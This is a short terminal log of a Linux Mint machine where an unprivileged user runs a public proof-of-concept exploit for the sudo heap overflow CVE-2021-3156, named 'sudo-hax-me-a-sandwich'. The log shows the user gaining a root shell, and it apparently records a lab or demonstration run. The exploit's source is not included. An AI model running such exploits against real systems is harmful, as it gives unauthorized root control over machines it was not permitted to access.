test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ id
uid=1001(test) gid=1001(test) groups=1001(test)
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ uname -a
Linux linux-mint-19-2 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ sudo -l
Matching Defaults entries for test on linux-mint-19-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User test may run the following commands on linux-mint-19-2:
(root) NOPASSWD: /usr/lib/linuxmint/mintUpdate/checkAPT.py
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
#